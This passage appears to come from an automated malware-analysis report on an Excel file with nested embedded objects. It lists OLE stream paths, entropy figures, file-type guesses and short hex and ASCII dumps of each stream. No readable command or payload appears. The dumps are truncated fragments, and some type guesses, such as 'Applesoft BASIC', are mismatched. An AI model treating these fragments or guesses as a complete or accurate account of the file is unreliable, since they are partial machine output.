Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path:	MBD00609F23/MBD007203CB/Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	134792
Entropy:	7.974168320310173
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a

General
Stream Path:	MBD00609F23/MBD00726B69/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.219515110876372
Base64 Encoded:	False
Data ASCII:	. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00609F23/MBD00726B69/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	26242
Entropy:	7.635424485665502
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00